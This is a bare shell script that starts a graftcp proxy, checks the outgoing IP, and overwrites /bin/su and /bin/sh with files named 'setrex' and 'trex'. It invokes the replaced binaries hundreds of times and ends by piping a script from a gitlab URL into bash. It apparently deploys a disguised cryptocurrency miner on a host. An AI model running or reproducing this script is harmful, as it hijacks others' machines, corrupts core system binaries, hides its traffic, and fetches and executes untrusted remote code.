export LD_PRELOAD=


./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2

echo " "
echo " "

echo ""

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

echo ""

echo " "
echo " "
sleep .2

sleep .2
mv setrex /bin/su
./graftcp/graftcp chmod +x /bin/su 
mv trex /bin/sh
./graftcp/graftcp chmod +x /bin/sh 
sleep 2s
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su
/bin/sh -c /bin/su


curl https://gitlab.com/kesiaderlo/nv2/-/raw/main/runrex.sh | bash

